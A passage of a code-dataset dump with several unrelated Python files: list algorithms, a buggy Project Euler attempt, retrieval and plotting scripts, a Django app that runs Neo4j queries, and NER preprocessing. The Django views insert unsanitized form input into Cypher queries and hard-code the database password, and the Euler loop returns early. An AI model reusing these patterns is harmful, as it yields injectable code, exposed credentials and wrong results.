ListNode, l2: ListNode) -> ListNode:\n \n # control empty lists\n if(l1==None) : return l2\n if(l2==None) : return l1\n \n # define start point (head)\n head=None\n if(l1.val<=l2.val):\n head=l1\n l1=l1.next\n else:\n head=l2\n l2=l2.next\n \n # connect lists\n l3_cur=head\n while(l1 and l2):\n if(l1.val<=l2.val):\n l3_cur.next=l1\n l3_cur=l3_cur.next\n l1=l1.next\n else:\n l3_cur.next=l2\n l3_cur=l3_cur.next\n l2=l2.next\n \n # 아직 None에 도달하지 않은 리스트를 연결 \n if(l1) : l3_cur.next=l1\n else : l3_cur.next=l2\n \n return head\n ","sub_path":"LinkedList/MergeTwoSortedLists/MergeTwoSortedLists/MergeTwoSortedLists.py","file_name":"MergeTwoSortedLists.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145052160","text":"def temp(x):\n sum=0\n for i in range(1,x):\n if (i%3 == 0) or (i%5 == 0):\n sum += i\n else:\n return sum\n\nprint(temp(10)) \nprint(\"answer: \", temp(1000))","sub_path":"EulerProject/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"331214598","text":"'''\n\nSort a linked list using insertion sort.\n\n'''\n\nfrom ListNode import ListNode\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n# @note: 下面超时解法,因��大数据而且是全部排序好的大数据,而fail\n# 所以,优化集中在怎么处理已经排序好的情况。这种题,一定要跟一个例子,否则细节很容易忽略\n# 优化在于,\n# 1. 如果其中某个sub-list是排序好的,比如,4,5,6,1,2,3 那么可以一次性把4,5,6切到dummy后面,然后一次性把1,2,3切到4前面\n# 2. cut操作head.next = None多余,因为后面插入的时候,head.next会overwrite掉,不需要先改成None\n#\n# ref: http://www.cnblogs.com/zuoyuan/p/3700105.html\n\nclass Solution(object):\n def insertionSortList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n \n if not head:\n return head\n \n dummy = ListNode(0)\n dummy.next = head\n \n while head.next:\n \n if head.val < head.next.val: # @note: meaning sub-list sorted\n head = head.next\n else:\n # head.next = None # cut this one from 2nd half sub-list # @note: 不需要这步\n \n # @note: eg: input 4,5,6,1,2,3 \n cutSingleNode = head.next # in eg. 1\n \n # in 1st half sub-list, find its position\n scanner = dummy # start at very beginning\n while scanner.next and scanner.next.val < cutSingleNode.val:\n scanner = scanner.next\n \n # now, head should be inserted after scanner\n # @note: eg: input 4,5,6,1,2,3 - now, head=6, scanner=dummy\n head.next = head.next.next # in eg. cut 1 out, and 6=>2\n cutSingleNode.next = scanner.next\n scanner.next = cutSingleNode\n \n # dummy = dummy.next # update tail of 1st half sub-list # @note: not necessary...to maintain tail node...\n \n return dummy.next\n\n\nclass Solution_over_time(object):\n def insertionSortList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n \n if not head:\n return head\n \n dummy = ListNode(0)\n dummyCopy = dummy\n \n while head:\n \n headNextRecord = head.next\n head.next = None # cut this one from 2nd half sub-list\n \n # in 1st half sub-list, find its position\n scanner = dummyCopy # start at very beginning\n while scanner.next and scanner.next.val < head.val:\n scanner = scanner.next\n \n # now, head should be inserted after scanner\n tmp = scanner.next\n scanner.next = head\n head.next = tmp\n \n head = headNextRecord # update new head of 2nd half sub-list\n \n # dummy = dummy.next # update tail of 1st half sub-list # @note: not necessary...to maintain tail node...\n \n return dummyCopy.next\n \nif __name__ == '__main__':\n pass","sub_path":"python/Insertion_Sort_List.py","file_name":"Insertion_Sort_List.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"646619488","text":"import os\nimport pickle as pkl\nfrom inspect import signature\n\nimport matplotlib.pyplot as plt\n\nfrom load import load_images_from_dir\nfrom retrieval import retrieve\nfrom util import calc_precision, calc_recall\nfrom util import get_categories_from_indices\nfrom util import read_config\nfrom retrieval import cascaded_retrieval\n\n\ncfg = read_config()\nfilenames, sketch_categories, sketches = load_images_from_dir(\n cfg['sketch_dir'])\n\nfeatures = cfg['features']\nfeature_dict = {}\nfor feature in features:\n img_features = pkl.load(open(os.path.join(cfg['feature_bank'], feature +\n \".pkl\"), \"rb\"))\n feature_dict[feature] = img_features\n\nmetric_dict = {'hu_moments': 'euclidean', 'hog': 'cityblock',\n 'sift': 'sift_distance'}\n\nresults = cascaded_retrieval(sketches, ['sift', 'hu_moments', 'sift', 'hu_moments'],\n feature_dict,\n [350, 150, 50, 20], metric_dict)\n\n# klist = [5 , 10, 20, 30]#, 90, 100, 110, 170, 180, 190, 195]\nklist = [20]\navg_precision_values = []\navg_recall_values = []\ntotal_category_images = 200\n\navg_precision_values_per_category = dict()\navg_recall_values_per_category = dict()\n\nfor category in sketch_categories:\n avg_precision_values_per_category[category] = []\n avg_recall_values_per_category[category] = []\n\nfor k in klist:\n print(\"Performance metrics at k = \", k)\n ppq = [] # precision per query\n rpq = []\n ppc = dict() # precision per category\n rpc = dict()\n\n for category in sketch_categories:\n ppc[category] = []\n rpc[category] = []\n\n total_queries = len(sketches)\n for i in range(len(results)):\n indices = results[i]\n img_categories = get_categories_from_indices(indices,\n cfg['categories'])\n query_precision = calc_precision(sketch_categories[i], img_categories)\n ppq.append(query_precision)\n query_recall = calc_recall(sketch_categories[i], img_categories,\n total_category_images)\n rpq.append(query_recall)\n ppc[sketch_categories[i]].append(query_precision)\n rpc[sketch_categories[i]].append(query_recall)\n\n avg_precision = sum(ppq) / total_queries\n avg_recall = sum(rpq) / total_queries\n avg_precision_values.append(avg_precision)\n avg_recall_values.append(avg_recall)\n print(\"Average precision: \", avg_precision)\n print(\"Average recall: \", avg_recall)\n\n for category in ppc:\n total_queries_per_category = len(ppc[category])\n avg_ppc = sum(ppc[category]) / total_queries_per_category\n avg_rpc = sum(rpc[category]) / total_queries_per_category\n avg_precision_values_per_category[category].append(avg_ppc)\n avg_recall_values_per_category[category].append(avg_rpc)\n print(\"Average precision per category-\", category, \" : \", avg_ppc)\n print(\"Average recall per category-\", category, \" : \", avg_rpc)\n\nstep_kwargs = ({'step': 'post'}\n if 'step' in signature(plt.fill_between).parameters\n else {})\n\nprint(\"avg precision values\", avg_precision_values)\nprint(\"avg recall values\", avg_recall_values)\n\nplt.step([0] + avg_recall_values,\n [avg_precision_values[0]] + avg_precision_values)\nplt.fill_between([0] + avg_recall_values, avg_precision_values + [0],\n alpha=0.2, **step_kwargs)\nplt.title(\"Precision Recall curve\")\nplt.xlabel(\"Recall\")\nplt.ylabel(\"Precision\")\nplt.ylim((0, 1))\nplt.show()\n\nfor category in avg_precision_values_per_category:\n precision_values = avg_precision_values_per_category[category]\n recall_values = avg_recall_values_per_category[category]\n print(category, \"avg precision values\", precision_values)\n print(category, \"avg recall values\", recall_values)\n plt.step([0] + recall_values, [precision_values[0]] + precision_values)\n plt.fill_between([0] + recall_values, precision_values + [0], alpha=0.2,\n **step_kwargs)\n title = \"Precision Recall curve for category- \" + category\n plt.title(title)\n plt.xlabel(\"Recall\")\n plt.ylabel(\"Precision\")\n plt.ylim((0, 1))\n plt.show()\n","sub_path":"src/cascading_experiments_shoe_dataset.py","file_name":"cascading_experiments_shoe_dataset.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"461613735","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\ndef E3Flux(E):\n return 1.43e-8 * np.power(E / 1000.0 , -2.7) * np.power(E, 3) # cm^-2 s^-1 sr^-1 GeV^-1 * GeV^3\n\ndef Electronflux(E):\n if E < 1000:\n return 1.37e-8 * np.power(E / 103.0, -3.17) * np.power(E, 3) # cm^-2 s^-1 sr^-1 GeV^-1 * GeV^3\n else:\n return 1.17e-11 * np.power(E / 1000.0, -3.9) * np.power(E, 3) # cm^-2 s^-1 sr^-1 GeV^-1 * GeV^3\n\nEnergy = np.logspace(1,6) # GeV\nbkg_rej = np.logspace(-6, -2, 5) # 10^-6, 10^-5, 10^-4, 10^-3, 10^-2\n\n\nfig = plt.figure(figsize=(8,6))\nsub = fig.add_subplot(111) # 1 row x 1 col, 1 subplot\n# cmap = plt.get_cmap('viridis', np.size(life))\n\n# for i in range(bkg_rej.size):\n# rejfactor = bkg_rej[i]\n# E3dNdE = rejfactor * np.array([E3Flux(x) for x in Energy])\n# sub.plot(Energy, E3dNdE, Lable = bkg_rej[i])\n\ndN1 = bkg_rej[0] * np.array([E3Flux(x) for x in Energy])\n\ndN2 = bkg_rej[1] * np.array([E3Flux(x) for x in Energy])\n\ndN3 = bkg_rej[2] * np.array([E3Flux(x) for x in Energy])\n\ndN4 = bkg_rej[3] * np.array([E3Flux(x) for x in Energy])\n\ndN5 = bkg_rej[4] * np.array([E3Flux(x) for x in Energy])\n\ndNE = np.array([Electronflux(x) for x in Energy])\n\nsub.plot(Energy,dN1, label=r'$10^{-6}$')\nsub.plot(Energy,dN2, label=r'$10^{-5}$')\nsub.plot(Energy,dN3, label=r'$10^{-4}$')\nsub.plot(Energy,dN4, label=r'$10^{-3}$')\nsub.plot(Energy,dN5, label=r'$10^{-2}$')\nsub.plot(Energy,dNE, label=\"CR-electron\")\n\nsub.legend()\nsub.set_xlabel(r'$Energy(GeV)$')\nsub.set_ylabel(r'$E^{3}\\frac{dN_e}{dE_{CR}}(GeV^2/(cm^2s\\ sr))$')\nsub.set_xscale('symlog')\nsub.set_yscale('log')\nplt.title(r'$normalized\\ f_{CR}(E) \\times background\\ rejection (\\epsilon_{CR})$') \n\nplt.show()","sub_path":"bkg_rejection_calculate/bkg_rejection.py","file_name":"bkg_rejection.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405789632","text":"from __future__ import print_function\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import loader\nfrom django import forms\nfrom django.urls import reverse\nfrom .forms import *\nfrom .models import *\nimport django_tables2 as tables\nfrom datetime import datetime, timezone\nfrom pprint import *\nfrom pprint import *\nimport jinja2 as jj\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, MultiField, ButtonHolder, Submit, HTML, Div, Row, Column\nfrom .generate_queries import *\nfrom django.forms.widgets import SelectDateWidget\nfrom dateutil import parser\n\n\nfrom neo4j.v1 import GraphDatabase, basic_auth\nfrom datetime import datetime\nimport json\nimport os\nimport time\n\nmatch_s = \"\"\"MATCH {% for aa in act_att %}({{aa[0]}} {{aa[1]}}),{% endfor %}\"\"\"\nwhere_s = \"\"\"WHERE {% for rel in rels %} ({{rel[0]}}) -[:{{rel[1]}}]-> ({{rel[2]}}) AND {% endfor %}\"\"\"\nreturn_s = \"\"\"RETURN {% for po in prop_vars %} {{po[0]}}({{po[1]}}), {% endfor %}\"\"\"\ntotal_s = \"\"\"\n{% for p in parts %}{{p}}\n{% endfor %}\n\"\"\"\n\ndef generate_simple_query(actors,attributes,relations,return_values):\n actors = [x[0]+\" :\"+x[1] for x in actors]\n attribs = [\", \".join([\"{\"+x[i][0]+\":\"+str(x[i][1])+\"}\" for i in range(len(x))]) for x in attributes]\n act_att = zip(actors,attribs)\n\n m_template = jj.Template(match_s)\n m_code = m_template.render(act_att=act_att)\n w_template = jj.Template(where_s)\n w_code = w_template.render(rels=relations)\n r_template = jj.Template(return_s)\n r_code = r_template.render(prop_vars=return_values)\n\n m_code = m_code.rstrip().rstrip(\",\")\n w_code = w_code.rstrip().rstrip(\"AND\")\n r_code = r_code.rstrip().rstrip(\",\")\n\n print(m_code)\n print(w_code)\n print(r_code)\n\n tot_template = jj.Template(total_s)\n tot_code = tot_template.render(parts=[m_code,w_code,r_code])\n return tot_code\n\n# sq = generate_simple_query(actors=[(\"u1\",\"USER\"),(\"u2\",\"USER\"),(\"x\",\"USER\")],attributes=[[(\"id\",101311381)],[(\"id\",44196397)],[]],relations=[(\"x\",\"FOLLOWS\",\"u1\"),(\"x\",\"FOLLOWS\",\"u2\")],return_values=[(\"count\",\"x\")])\n\nclass UserForm(forms.Form):\n User_Variable = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n UserId = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass TweetForm(forms.Form):\n Variable_Name = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Hashtag = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Retweet_Of = forms.ModelChoiceField(queryset=Tweet.objects.all(),required=False)\n Reply_Of = forms.ModelChoiceField(queryset=Tweet.objects.all(),required=False)\n Quoted = forms.ModelChoiceField(queryset=Tweet.objects.all(),required=False)\n Has_Mentioned = forms.ModelChoiceField(queryset=User.objects.all(),required=False)\n\nclass RelationForm(forms.Form):\n Source = forms.ModelChoiceField(queryset=User.objects.all(),required=False)\n URelationShip = forms.ChoiceField(choices=[(x,x) for x in [None,\"FOLLOWS\",\"STARTED_FOLLOWING\",\"FOLLOWED\"]],required=False)\n UDestination = forms.ModelChoiceField(queryset=User.objects.all(),required=False)\n \n Ut1 = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Ut1m = forms.TimeField(widget=forms.TimeInput(format='%H:%M'),required=False)\n Ut2 = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Ut2m = forms.TimeField(widget=forms.TimeInput(format='%H:%M'),required=False)\n\n TRelationShip = forms.ChoiceField(choices=[(x,x) for x in [None,\"TWEETED\"]],required=False)\n TDestination = forms.ModelChoiceField(queryset=Tweet.objects.all(),required=False)\n\n Tt1 = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Tt1m = forms.TimeField(widget=forms.TimeInput(format='%H:%M'),required=False)\n\n Tt2 = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Tt2m = forms.TimeField(widget=forms.TimeInput(format='%H:%M'),required=False)\n\nclass EvaluateForm(forms.Form):\n Eval_Variable = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Property = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass TweetTable(tables.Table):\n Variable_Name = tables.Column()\n Hashtag = tables.Column()\n Retweet_Of = tables.Column()\n Reply_Of = tables.Column()\n Quoted = tables.Column()\n Has_Mentioned = tables.Column()\n\n class Meta:\n attrs = {'class': 'paleblue','width':'200%'}\n\nclass UserTable(tables.Table):\n Variable_Name = tables.Column()\n UserId = tables.Column()\n class Meta:\n attrs = {'class': 'paleblue','width':'200%'}\n\nclass RelationTable(tables.Table):\n Source = tables.Column()\n Relation_Ship = tables.Column()\n Destination = tables.Column()\n Begin = tables.Column()\n End = tables.Column()\n class Meta:\n attrs = {'class': 'paleblue','width':'200%'}\n\nclass DummyForm(forms.Form):\n pass\n\n########################################################### View functions ###############################################################\ndef index(request):\n if(request.method==\"GET\"):\n dummy1 = DummyForm()\n dummy2 = DummyForm()\n\n elif(\"simple\" in request.POST):\n print(\"came here\")\n return HttpResponseRedirect(reverse(\"answer_query\"))\n elif(\"custom\" in request.POST):\n print(\"came here\")\n return HttpResponseRedirect(reverse(\"query\"))\n\n dummy1 = DummyForm()\n dummy2 = DummyForm()\n return render(request, 'use/index.html', {\"dummy1\":dummy1, \"dummy2\":dummy2})\n\ndef transform_time(t,tm):\n # print(parser.parse(str(t)[:5]+\" \"+str(tm)))\n return parser.parse(str(t)[:5]+\" \"+str(tm)).timestamp()\n\ndef query(request):\n output_s = \"\"\n query_s = \"\"\n if request.method == 'GET':\n uform = UserForm()\n tform = TweetForm()\n rform = RelationForm()\n eform = EvaluateForm()\n\n elif \"b1\" in request.POST:\n uform = UserForm(request.POST)\n print(\"first button pressed\")\n if uform.is_valid():\n vn = uform.cleaned_data['User_Variable']\n i = uform.cleaned_data['UserId']\n print(\"vn is \",vn)\n s = User.objects.create( uname= vn,userid=i)\n elif \"b2\" in request.POST:\n tform = TweetForm(request.POST)\n print(\"second button pressed\")\n if tform.is_valid():\n n = tform.cleaned_data['Variable_Name']\n ht = tform.cleaned_data['Hashtag']\n retof = tform.cleaned_data['Retweet_Of']\n repof = tform.cleaned_data['Reply_Of']\n quo = tform.cleaned_data['Quoted']\n hasmen = tform.cleaned_data['Has_Mentioned']\n if(retof==None):\n retofs = \"\"\n else:\n retofs = retof.tname\n if(repof==None):\n repofs = \"\"\n else:\n repofs = retof.tname\n if(quo==None):\n quos = \"\"\n else:\n quos = quo.tname\n if(hasmen==None):\n hasmens = \"\"\n else:\n hasmens = hasmen.uname\n s = Tweet.objects.create(tname= n,hashtag=ht,retweet_of=retofs,reply_of=repofs,quoted=quos,has_mention=hasmens)\n elif \"b3\" in request.POST:\n rform = RelationForm(request.POST)\n print(\"third button pressed\")\n if rform.is_valid():\n # pprint(rform.cleaned_data)\n src = rform.cleaned_data['Source']\n udst = rform.cleaned_data['UDestination']\n tdst = rform.cleaned_data['TDestination']\n urel = rform.cleaned_data['URelationShip']\n trel = rform.cleaned_data['TRelationShip']\n ut1d = rform.cleaned_data['Ut1']\n ut1m = rform.cleaned_data['Ut1m']\n\n ut2d = rform.cleaned_data['Ut2']\n ut2m = rform.cleaned_data['Ut2m']\n\n tt1d = rform.cleaned_data['Tt1']\n tt1m = rform.cleaned_data['Tt1m']\n\n tt2d = rform.cleaned_data['Tt2']\n tt2m = rform.cleaned_data['Tt2m']\n\n try:\n ut1 = transform_time(ut1d,ut1m)\n except:\n ut1 = \"\"\n try:\n ut2 = transform_time(ut2d,ut2m)\n except:\n ut2 = \"\"\n try:\n tt1 = transform_time(tt1d,tt1m)\n except:\n tt1 = \"\"\n try:\n tt2 = transform_time(tt2d,tt2m)\n except:\n tt2 = \"\"\n\n print(\"the values of times are \",ut1,ut2,tt1,tt2)\n\n if src!=None and urel!=None and udst!=None:\n s = Relation.objects.create( source= src.uname,relation=urel,destn=udst.uname,bt=ut1,et=ut2)\n if src!=None and trel!=\"\" and tdst!=None:\n print(trel)\n s = Relation.objects.create( source= src.uname,relation=trel,destn=tdst.tname,bt=tt1,et=tt2)\n elif \"submit\" in request.POST:\n print(\"came into submit condition \")\n users = []\n uprops = []\n tweets = []\n tprops = []\n relations = []\n eform = EvaluateForm(request.POST)\n if eform.is_valid():\n var = eform.cleaned_data['Eval_Variable']\n prop = eform.cleaned_data['Property']\n for u in User.objects.all():\n users.append((u.uname,\"USER\"))\n up = []\n if u.userid!=\"\":\n up.append((\"id\",u.userid))\n uprops.append(up)\n for t in Tweet.objects.all():\n tweets.append((t.tname,\"TWEET\"))\n tp = []\n if t.hashtag!=\"\":\n tp.append((\"hashtag\",t.hashtag))\n if t.retweet_of!=\"\":\n tp.append((\"retweet_of\",t.retweet_of))\n if t.reply_of!=\"\":\n tp.append((\"reply_of\",t.reply_of))\n if t.quoted!=\"\":\n tp.append((\"quoted\",t.quoted))\n if t.has_mention!=\"\":\n tp.append((\"has_mention\",t.has_mention))\n tprops.append(tp)\n for r in Relation.objects.all():\n relations.append((r.source,r.relation,r.destn,r.bt,r.et))\n pprint(users)\n pprint(uprops)\n pprint(tweets)\n pprint(tprops)\n pprint(relations)\n sq = create_query(actors=users+tweets,attributes=uprops+tprops,relations=relations,return_values=[(prop,var)])\n print(\"the query is \",sq)\n query_s = sq\n \n driver = GraphDatabase.driver(\"bolt://localhost:7687\", auth=basic_auth(\"neo4j\", \"password\"))\n session = driver.session()\n result = session.run(sq,{})\n for r in result:\n print(r)\n output_s += str(r)\n session.close()\n \n User.objects.all().delete()\n Tweet.objects.all().delete()\n Relation.objects.all().delete()\n\n d = []\n for usr in User.objects.all():\n d.append({\"Variable_Name\":usr.uname,\"UserId\":usr.userid})\n utable = UserTable(d)\n d = []\n for twt in Tweet.objects.all():\n d.append({\"Variable_Name\":twt.tname,\"Hashtag\":twt.hashtag,\"Retweet_Of\":twt.retweet_of,\"Reply_Of\":twt.reply_of,\"Quoted\":twt.quoted,\"Has_Mentioned\":twt.has_mention})\n ttable = TweetTable(d)\n\n d = []\n for rel in Relation.objects.all():\n d.append({\"Source\":rel.source,\"Relation_Ship\":rel.relation,\"Destination\":rel.destn,\"Begin\":rel.bt,\"End\":rel.et})\n rtable = RelationTable(d)\n # print(d)\n tables.RequestConfig(request).configure(utable)\n tables.RequestConfig(request).configure(ttable)\n tables.RequestConfig(request).configure(rtable)\n\n uform = UserForm()\n tform = TweetForm()\n rform = RelationForm()\n eform = EvaluateForm()\n return render(request, 'use/query.html', {\"query_s\":query_s, 'output_s':output_s, 'uform': uform,'tform': tform,'rform': rform, 'eform' : eform, 'user_list':utable,'tweet_list':ttable,'relation_list':rtable,})\n\n\n\nq1 = \"\"\"match (u:USER)-[:TWEETED]->(t:TWEET)-[:HAS_HASHTAG]->(:HASHTAG {text:\"{{h}}\"}) with distinct u as u1 return count(u1)\"\"\"\nq2 = \"\"\"match (x:USER)-[:FOLLOWS]->(:USER {id:{{u1}}}), (x)-[:FOLLOWS]->(:USER {id:{{u2}}}) with distinct x as x1 return count(x1)\"\"\"\nq3 = \"\"\"\nmatch (fe:FOLLOW_EVENT)-[:FE_FOLLOWED]->(u:USER {id:{{u}}}) \nwhere fe.timestamp > {{t1}} and fe.timestamp < {{t2}}\nreturn count(fe)\n\"\"\"\nq4 = \"\"\"\nmatch (x:USER {id:{{u}}})-[:TWEETED]->(:TWEET)-[:HAS_HASHTAG]->(h:HASHTAG), (f:USER)-[:FOLLOWS]->(x), (f)-[:TWEETED]->(:TWEET)-[:HAS_HASHTAG]->(h) \nwith distinct f as f1 \nreturn count(f1)\n\"\"\"\nq5 = \"\"\"\nmatch (te:TWEET_EVENT)-[:TE_TWEET]->(:TWEET)-[:RETWEET_OF]->(t:TWEET), (te)-[:TE_USER]->(:USER {id:{{u}}}), (x:USER)-[:TWEETED]->(t) \nwhere te.timestamp < {{t1}} and te.timestamp > {{t2}} \nwith distinct x as x1 \nreturn count(x1)\n\"\"\"\nclass SameHash(forms.Form):\n Hashtag = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass CommomFollower(forms.Form):\n User1 = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n User2 = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass NewFollowers(forms.Form):\n User = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Begin_Date = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Begin_Time = forms.TimeField(required=False,widget=forms.TimeInput(format='%H:%M'))\n\n End_Date = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n End_Time = forms.TimeField(required=False,widget=forms.TimeInput(format='%H:%M'))\n\nclass HashFolForm(forms.Form):\n User = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass RetweetForm(forms.Form):\n User = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Begin_Date = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Begin_Time = forms.TimeField(required=False,widget=forms.TimeInput(format='%H:%M'))\n\n End_Date = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n End_Time = forms.TimeField(required=False,widget=forms.TimeInput(format='%H:%M'))\n\n\n\ndef answer_query(request):\n query_s = \"\"\n output_s = \"\"\n if(request.method==\"GET\"):\n shform = SameHash()\n cf = CommomFollower()\n nf = NewFollowers()\n hf = HashFolForm()\n rfform = RetweetForm()\n dummy = DummyForm()\n\n elif(\"custom\" in request.POST):\n print(\"came here\")\n return HttpResponseRedirect(reverse(\"query\"))\n else:\n if(\"b1\" in request.POST):\n shform = SameHash(request.POST)\n print(\"first button pressed\")\n if shform.is_valid():\n h = shform.cleaned_data['Hashtag']\n q_template = jj.Template(q1)\n q_code = q_template.render(h=h)\n query_s = q_code\n elif(\"b2\" in request.POST):\n cfform = CommomFollower(request.POST)\n print(\"second button pressed\")\n if cfform.is_valid():\n u1 = cfform.cleaned_data['User1']\n u2 = cfform.cleaned_data['User2']\n q_template = jj.Template(q2)\n q_code = q_template.render(u1=u1,u2=u2)\n query_s = q_code\n elif(\"b3\" in request.POST):\n nfform = NewFollowers(request.POST)\n print(\"third button pressed\")\n if nfform.is_valid():\n u = nfform.cleaned_data['User']\n bd = nfform.cleaned_data['Begin_Date']\n bt = nfform.cleaned_data['Begin_Time']\n ed = nfform.cleaned_data['End_Date']\n et = nfform.cleaned_data['End_Time']\n\n t1 = transform_time(bd,bt)\n t2 = transform_time(ed,et)\n\n q_template = jj.Template(q3)\n q_code = q_template.render(u=u,t1=t1,t2=t2)\n query_s = q_code\n elif(\"b4\" in request.POST):\n hfform = HashFolForm(request.POST)\n print(\"4th button pressed\")\n if hfform.is_valid():\n u = hfform.cleaned_data['User']\n q_template = jj.Template(q4)\n q_code = q_template.render(u=u)\n query_s = q_code\n\n elif(\"b5\" in request.POST):\n rfform = NewFollowers(request.POST)\n print(\"5th button pressed\")\n if rfform.is_valid():\n u = rfform.cleaned_data['User']\n bd = rfform.cleaned_data['Begin_Date']\n bt = rfform.cleaned_data['Begin_Time']\n ed = rfform.cleaned_data['End_Date']\n et = rfform.cleaned_data['End_Time']\n t1 = transform_time(bd,bt)\n t2 = transform_time(ed,et)\n\n q_template = jj.Template(q5)\n q_code = q_template.render(u=u,t1=t1,t2=t2)\n query_s = q_code\n driver = GraphDatabase.driver(\"bolt://localhost:7687\", auth=basic_auth(\"neo4j\", \"password\"))\n session = driver.session()\n result = session.run(q_code,{})\n for r in result:\n print(r)\n output_s += str(r)\n session.close()\n\n shform = SameHash()\n cfform = CommomFollower()\n nfform = NewFollowers()\n hfform = HashFolForm()\n rfform = RetweetForm()\n dummy = DummyForm()\n return render(request, 'use/ans_query.html', {\"dummy\":dummy,\"shform\":shform, \"cfform\":cfform, \"nfform\":nfform, \"hfform\":hfform, \"rfform\":rfform, \"query_s\":query_s,\"output_s\":output_s})","sub_path":"Query Gen Website/use/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97992330","text":"from collections import Counter\nimport json\n\nimport ftfy\n\nimport sys, os\nimport re\nfrom glob import glob\nfrom nltk import word_tokenize\n\nsys.path.insert(1, '../scripts/convert_standoff_conll_ner/')\nimport anntoconll_wlp\n\n\n\n\n\ndef Read_Files_in_Input_Folder(input_folder):\n start_dir = input_folder\n # start_dir = \"/Users/jeniya/Desktop/NER_RECOG_SW/brat-v1.3_Crunchy_Frog/data/so_annotated_data/selected/phase_01_01\"\n pattern = \"*.txt\"\n file_location_list=[]\n for dir,_,_ in os.walk(start_dir):\n file_location_list.extend(glob(os.path.join(dir,pattern))) \n \n # print(\"total prtocols in : \", input_folder,\" = \", len(file_location_list))\n return sorted(file_location_list)\n\n\ndef Merge_Files(list_of_ip_files, op_file):\n\n fout = open(op_file,'w')\n\n for file in list_of_ip_files:\n for line in open(file):\n fout.write(line)\n\n\ndef make_dir_if_not_exists(dir_name):\n try:\n os.mkdir(dir_name)\n except Exception as e:\n pass\n\n\ndef preprocess_data(input_standoff_folder_train, output_conll_folder_train, output_conll_file_train,\n input_standoff_folder_test, output_conll_folder_test, output_conll_file_test):\n anntoconll_wlp.convert_standoff_conll_single_file(input_standoff_folder_train, output_conll_folder_train, output_conll_file_train)\n anntoconll_wlp.convert_standoff_conll_single_file(input_standoff_folder_test, output_conll_folder_test, output_conll_file_test)\n \n\n\n\n\n\nclass Sort_Entity_by_Count:\n \"\"\"docstring for Sort_Entity_by_Count\"\"\"\n def __init__(self, train_file,output_file):\n l = self.Read_File(train_file)\n #\n self.list_of_train_sentence_words=l[0]\n self.list_of_train_sentence_labels=l[1]\n\n train_label_counter = Counter(x for xs in self.list_of_train_sentence_labels for x in xs)\n train_result=self.get_label_counter(train_label_counter)\n\n\n list_keys= [x[0] for x in train_result[\"label_phrase_counter\"].most_common()]\n with open(output_file, 'w') as outfile:\n json.dump(list_keys, outfile)\n\n\n\n def get_label_counter(self, label_counter):\n label_phrase_counter=Counter()\n label_word_counter=Counter()\n\n word_count=0\n entities_count=0\n\n for c in label_counter:\n split_c=c.split(\"-\",1)\n type_c=split_c[0]\n if type_c==\"O\":\n word_count+=label_counter[c]\n continue\n entity_name=split_c[1]\n #print(entity_name, split_c, type_c)\n if type_c==\"B\":\n label_phrase_counter[entity_name]+=label_counter[c]\n label_word_counter[entity_name]+=label_counter[c]\n word_count+=label_counter[c]\n entities_count+=label_counter[c]\n elif type_c==\"I\":\n label_word_counter[entity_name]+=label_counter[c]\n\n result={}\n result[\"label_phrase_counter\"]=label_phrase_counter\n result[\"word_count\"]=word_count\n result[\"entity_count\"]=entities_count\n result[\"label_word_counter\"]=label_word_counter\n return result\n\n\n def Read_File(self, ip_file):\n list_of_sentence_words_in_file=[]\n list_of_sentence_labels_in_file=[]\n current_sent_words=[]\n current_sent_labels=[]\n\n for line in open(ip_file):\n line=line.strip()\n if line==\"\":\n list_of_sentence_words_in_file.append(current_sent_words)\n 